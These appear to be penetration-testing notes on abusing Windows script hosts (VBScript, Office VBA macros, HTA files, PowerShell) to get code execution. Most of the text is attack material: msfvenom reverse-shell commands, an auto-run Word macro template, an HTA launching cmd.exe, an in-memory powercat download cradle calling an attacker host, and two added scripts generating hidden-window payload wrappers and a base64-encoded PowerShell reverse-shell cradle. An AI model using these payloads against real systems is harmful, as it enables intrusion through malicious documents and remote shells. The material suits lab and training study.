# Windows Script Host (WSH)


## Visual Basic Script (VB Script)
* `cscript file.vbs`, console host (script output goes to the command line)
* `wscript file.vbs`, GUI host (script output goes to dialog boxes)

* Example: start `cmd.exe` through the `WScript.Shell` object. The script's own path (`WScript.ScriptFullName`) is appended as an argument, so the space after `cmd.exe` inside the string is required; window style `0` hides the window and `True` blocks until the command returns
```vb
Set shell = WScript.CreateObject("WScript.Shell")
' Run(strCommand, intWindowStyle, bWaitOnReturn): 0 = hidden window, True = wait for exit
shell.Run "C:\Windows\System32\cmd.exe " & WScript.ScriptFullName, 0, True
```
* Save it with a harmless extension (here `.txt`) and force the VBScript engine with the `//E:` host option, useful when `.vbs` files are filtered by extension
```sh
c:\Windows\System32>wscript //E:VBScript c:\Users\user\Documents\shell.txt
```

## Visual Basic for Applications (VBA)
* Office macro language; a macro can call the Windows API directly through `Declare` statements, which is how the msfvenom VBA payload loads its shellcode
* Open Word, `View` --> `Macros`, give the macro a name and select the current document under `Macros in`
* Create the reverse shell
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
```
* The `-f vba` output is a complete module with its own auto-run subs (`Auto_Open`, `Workbook_Open`), so paste it in as the whole module. For a hand-written payload use the template below: `Workbook_Open()` fires for Excel, `Document_Open()` and the legacy `AutoOpen()` for Word
```vb
' Word runs Document_Open (and the legacy AutoOpen) when the document opens;
' Excel runs Workbook_Open instead. Each one just calls the payload sub.
Sub Document_Open()
  RunPayload
End Sub

Sub AutoOpen()
  RunPayload
End Sub

' Named RunPayload rather than SHELL so it does not shadow VBA's built-in Shell function
Sub RunPayload()
    ' <reverse shell goes here>
End Sub
```
* Save the document in a macro-enabled format such as `Word 97-2003 Document` (`.doc`) or `Word 97-2003 Template` (`.dot`); the default `.docx` cannot carry macros

## HTML Application (HTA)

* An HTML file whose embedded script (JScript or VBScript) is run by `mshta.exe` as a trusted application rather than inside the browser sandbox, so it can instantiate ActiveX objects such as `WScript.Shell`
* Executed with `mshta file.hta`, or `mshta http://<attacker-IP>/file.hta` straight from a web server

### POC
* Host the file on the attacker's web server and have the target download or open it
* File should look like
```html
<html>
  <body>
    <script language="JScript">
      // Same WScript.Shell object as in the VBScript example; Run() starts the command
      var shell = 'cmd.exe';
      new ActiveXObject('WScript.Shell').Run(shell);
    </script>
  </body>
</html>
```
* Save it with the `.hta` extension and run it on the target with `mshta shell.hta`, or point `mshta` at its URL on the attacker's server
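The VBScript and HTA wrappers above differ only in their host language, and the usual mistake when a real payload replaces `cmd.exe` (for instance a `powershell -c "..."` cradle with nested quotes) is the string escaping. The following POSIX shell script is an added example, not part of the original notes: run on the attacker machine, it builds both wrappers around one Windows command line, doubling `"` for the VBScript literal and backslash-escaping the JScript literal, and also writes the `.txt` copy for the `//E:VBScript` trick. The demo command, output directory and the `hta:application` attributes are constructed for this example.

```shell
#!/bin/sh
# Added example: build the VBScript and HTA wrappers from these notes around one
# Windows command line, with correct escaping for each host language.
# The demo command and output directory are stand-ins constructed for the example.
set -eu

# A VBScript string literal escapes an embedded double quote by doubling it.
vbs_escape() {
  printf '%s' "$1" | sed 's/"/""/g'
}

# A JScript single-quoted literal needs backslash and single quote escaped.
js_escape() {
  printf '%s' "$1" | sed -e 's/\\/\\\\/g' -e "s/'/\\\\'/g"
}

# VBScript wrapper: WScript.Shell.Run(strCommand, intWindowStyle, bWaitOnReturn)
# with window style 0 (hidden) and no wait, so the script itself exits at once.
make_vbs() {
  vbs_cmd=$(vbs_escape "$1")
  cat <<EOF
Set shell = WScript.CreateObject("WScript.Shell")
shell.Run "$vbs_cmd", 0, False
EOF
}

# HTA wrapper: the same Run call through ActiveX, executed by mshta.exe.
# The hta:application tag keeps the mshta window minimized and out of the
# taskbar; window.close() ends the application after the command is started.
make_hta() {
  hta_cmd=$(js_escape "$1")
  cat <<EOF
<html>
  <head>
    <hta:application id="app" windowstate="minimize" showintaskbar="no">
  </head>
  <body>
    <script language="JScript">
      var shell = new ActiveXObject('WScript.Shell');
      shell.Run('$hta_cmd', 0, false);
      window.close();
    </script>
  </body>
</html>
EOF
}

# Write shell.vbs, the same script as shell.txt (for wscript //E:VBScript when
# .vbs is filtered) and shell.hta into a directory, then print how to run them.
write_wrappers() {
  out_cmd=$1
  out_dir=$2
  mkdir -p "$out_dir"
  make_vbs "$out_cmd" > "$out_dir/shell.vbs"
  cp "$out_dir/shell.vbs" "$out_dir/shell.txt"
  make_hta "$out_cmd" > "$out_dir/shell.hta"
  cat <<EOF
wrote $out_dir/shell.vbs $out_dir/shell.txt $out_dir/shell.hta
on the target:
  wscript shell.vbs
  wscript //E:VBScript shell.txt
  mshta shell.hta
EOF
}

# Demo: sh make_wrappers.sh 'cmd.exe /c whoami > C:\Temp\who.txt' ./out
if [ $# -eq 2 ]; then
  write_wrappers "$1" "$2"
fi
```

The escaping functions are the part worth keeping: a payload containing `'` or `\` that is pasted unescaped into the HTA's JScript literal silently breaks the script, and mshta gives no useful error for it.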


### Reverse Shell
* Craft the HTA via `msfvenom` (`hta-psh` embeds a PowerShell stager in the HTA)
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta
```
* Or let `msfconsole` host the HTA and catch the session
```sh
use exploit/windows/misc/hta_server
set LHOST <attacker-IP>
run
```

## PowerShell

* The execution policy only restricts running `.ps1` files (not commands passed on the command line) and is not a security boundary. Check it via
```powershell
Get-ExecutionPolicy
```
* Set policy via
```powershell
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
```
* Bypass it for a single process via (`-ex` or `-ep` are accepted abbreviations of `-ExecutionPolicy`)
```sh
powershell -ExecutionPolicy Bypass -File shell.ps1
```
* Clone [powercat](https://github.com/besimorhino/powercat.git) on the attacker machine, serve it over HTTP (e.g. `python3 -m http.server 8000` in the checkout) and start a listener (`nc -lvnp 4448`), then load it in memory on the target and connect back via
```sh
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
```
* Or generate the payload as a `.ps1` with msfvenom (`-f psh`) and run it with the bypass above
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1
```
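The `powershell -c "..."` cradle above is awkward to pass through cmd.exe, a VBScript string or an HTA because of its nested quotes. The following POSIX shell script is an added example, not part of the original notes: it builds that same powercat cradle for a given attacker IP and ports and emits it as `-EncodedCommand` (base64 of the UTF-16LE text, the encoding powershell.exe expects), together with the matching HTTP server and listener commands for the attacker side. The IP `10.10.14.5`, the ports and the `powercat` checkout directory are constructed stand-ins.

```shell
#!/bin/sh
# Added example: build the powercat download cradle from these notes as a
# PowerShell one-liner and hand it to powershell.exe as -EncodedCommand, which
# avoids the quoting pitfalls of the -c "..." form. IP, ports and the checkout
# directory are constructed stand-ins.
set -eu

# PowerShell source of the cradle: pull powercat.ps1 into memory with IEX and
# connect back with cmd.exe bound to the socket.
build_cradle() {
  printf "IEX(New-Object System.Net.WebClient).DownloadString('http://%s:%s/powercat.ps1');powercat -c %s -p %s -e cmd" \
    "$1" "$2" "$1" "$3"
}

# -EncodedCommand expects base64 of the UTF-16LE text. The cradle is ASCII, so
# UTF-16LE is each character followed by a NUL byte; done here without iconv.
utf16le_b64() {
  s=$1
  i=1
  while [ "$i" -le "${#s}" ]; do
    c=$(printf '%s' "$s" | cut -c "$i")
    printf '%s\000' "$c"
    i=$((i + 1))
  done | base64 | tr -d '\n'
}

# Full command line for the target. -nop skips profile scripts and -w hidden
# hides the window. Execution policy governs .ps1 files only, so neither this
# form nor -c "..." is affected by it.
target_command() {
  printf 'powershell -nop -w hidden -EncodedCommand %s\n' \
    "$(utf16le_b64 "$(build_cradle "$1" "$2" "$3")")"
}

# Attacker side, before the target runs the line above: serve powercat.ps1 from
# the powercat checkout and listen for the callback.
attacker_setup() {
  cat <<EOF
cd powercat && python3 -m http.server $2
nc -lvnp $3
EOF
}

# Demo with constructed values: sh encoded_cradle.sh 10.10.14.5 8000 4448
if [ $# -eq 3 ]; then
  attacker_setup "$@"
  target_command "$@"
fi
```

The `SQBFAFgA` prefix that every encoded `IEX(` cradle starts with is also what defenders grep for in process creation logs, so treat the encoded form as a quoting convenience rather than an evasion.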